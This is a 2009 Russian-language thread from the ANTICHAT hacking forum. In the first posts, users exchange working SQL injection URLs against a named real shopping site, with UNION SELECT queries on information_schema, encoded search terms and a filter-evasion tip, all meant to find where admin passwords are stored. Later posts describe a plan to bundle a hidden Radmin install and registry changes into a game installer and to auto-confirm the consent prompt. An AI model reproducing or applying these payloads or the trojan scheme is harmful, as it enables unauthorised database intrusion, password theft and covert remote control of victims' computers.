HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 23.01.2009, 23:22
Gemini12
Познающий
Регистрация: 24.12.2008
Сообщений: 54
Провел на форуме:
253038

Репутация: 9
По умолчанию

Цитата:
Сообщение от pinky07  
попробуй составить запрос типа http://www.technodom.kz/index.php?go=news&news=1+union+select+1,table_name ,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+inf ormation_schema.columns+where+column_name+like+cha r(37,112,97,115,115,37)&q=wNW616thoUBWHv3
запрос типа вывести все строки, где имеется словосочетание pass, попробуй вместо pass подставить login, name итд...
Не выходит
Скорее всего админ хранит пассы в другой бд, кто знает подскажите как определить в какой и как туда попасть?
 
Ответить с цитированием

  #2  
Старый 23.01.2009, 23:38
pinky07
Познающий
Регистрация: 02.01.2009
Сообщений: 55
Провел на форуме:
393715

Репутация: 90
По умолчанию

Цитата:
Сообщение от Gemini12  
Не выходит
Скорее всего админ хранит пассы в другой бд, кто знает подскажите как определить в какой и как туда попасть?
попробуй так
Цитата:
http://www.technodom.kz/index.php?go=news&news=1+union+select+1,table_sche ma,3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18+from+information_schema.co l umns+where+table_name=COLLATIONS&q=wNW616thoUBWHv3
table_name=любая стандартная таблица
должна вывести имя бд где находиться стандартная таблица COLLATIONS,
P.s если есть фильтры имя таблицы напиши в hex'e

Последний раз редактировалось pinky07; 23.01.2009 в 23:41..
 
Ответить с цитированием

  #3  
Старый 23.01.2009, 23:27
Neponomat
Новичок
Регистрация: 23.01.2009
Сообщений: 11
Провел на форуме:
60789

Репутация: 0
По умолчанию

Всем привет!
Я чайник, даже самовар большая просьба ко всем кто в курсе, ответить
Можно ли сделать так, что во время появления на экране окошка с предложением изменения реестра да - нет, запустить программу, которая сама нажмёт кнопку да, как только появиться это окно проще говоря, чтобы запись в реестр проходила без запроса у пользователя.
Можно так или нет? Если да то как??
 
Ответить с цитированием

  #4  
Старый 23.01.2009, 23:29
kevmen
Участник форума
Регистрация: 29.10.2008
Сообщений: 165
Провел на форуме:
397889

Репутация: 60
По умолчанию

Gemini12,попробуй выведи все таблицы сиптом)может найдешь что-нибудь )
 
Ответить с цитированием

  #5  
Старый 23.01.2009, 23:31
kevmen
Участник форума
Регистрация: 29.10.2008
Сообщений: 165
Провел на форуме:
397889

Репутация: 60
По умолчанию

Neponomat,если бы так можно было,тогда зачем фаэрволы?зачем нам надежные браузеры!
 
Ответить с цитированием

  #6  
Старый 24.01.2009, 00:10
Neponomat
Новичок
Регистрация: 23.01.2009
Сообщений: 11
Провел на форуме:
60789

Репутация: 0
По умолчанию

Цитата:
Сообщение от kevmen  
Neponomat,если бы так можно было,тогда зачем фаэрволы?зачем нам надежные браузеры!
ну например скачал я игру в ехе и запустил установку, а в ехешнике игры находится радмин и файл реестра который делает скрытым присутствие радмина и устанавливает свой пароль, и сразу же после запуска файла реестра, запускается ещё одна скрытая программа, которая нажимает ДА для того чтобы данные были внесены, и поэтому запуск файла реестра не вызывает подозрения, ведь он сам запустился. короче говоря былобы не плохо если есть микро прога которая автоматом жмёт кнопку ентер два раза подряд
Во
 
Ответить с цитированием

  #7  
Старый 24.01.2009, 00:14
kevmen
Участник форума
Регистрация: 29.10.2008
Сообщений: 165
Провел на форуме:
397889

Репутация: 60
По умолчанию

Цитата:
Сообщение от Neponomat  
ну например скачал я игру в ехе и запустил установку, а в ехешнике игры находится радмин и файл реестра который делает скрытым присутствие радмина и устанавливает свой пароль, и сразу же после запуска файла реестра, запускается ещё одна скрытая программа, которая нажимает ДА для того чтобы данные были внесены, и поэтому запуск файла реестра не вызывает подозрения, ведь он сам запустился. короче говоря былобы не плохо если есть микро прога которая автоматом жмёт кнопку ентер два раза подряд
Во
фаэрвол будет ругаться и антивирус
 
Ответить с цитированием

  #8  
Старый 24.01.2009, 00:19
Neponomat
Новичок
Регистрация: 23.01.2009
Сообщений: 11
Провел на форуме:
60789

Репутация: 0
По умолчанию

Цитата:
Сообщение от kevmen  
фаэрвол будет ругаться и антивирус
ну незнаю почему он должен ругаться?? ладно фаервол крикнет ченить, но ведь игра устанавливается, значит так надо для игры а антивирус то чего будет кричать? яу меня вон установлен нод 32 так я реестр скопировал а потом запускаю его и ничего не кричит, да и с чего вдруг ему кричать?
 
Ответить с цитированием

  #9  
Старый 24.01.2009, 14:28
kevmen
Участник форума
Регистрация: 29.10.2008
Сообщений: 165
Провел на форуме:
397889

Репутация: 60
По умолчанию

Цитата:
Сообщение от Neponomat  
ну незнаю почему он должен ругаться?? ладно фаервол крикнет ченить, но ведь игра устанавливается, значит так надо для игры а антивирус то чего будет кричать? яу меня вон установлен нод 32 так я реестр скопировал а потом запускаю его и ничего не кричит, да и с чего вдруг ему кричать?
он будет говорить,что это троян!Даже бат он распознает как троя!
 
Ответить с цитированием

  #10  
Старый 23.01.2009, 23:39
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
По умолчанию

pinky07,
Ты с ума сошёл? Ты сейчас его только запутаешь...

Gemini12,
Ничего кроме users не нашел, видимо, не судьба.

Последний раз редактировалось R1dex; 24.01.2009 в 00:01..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.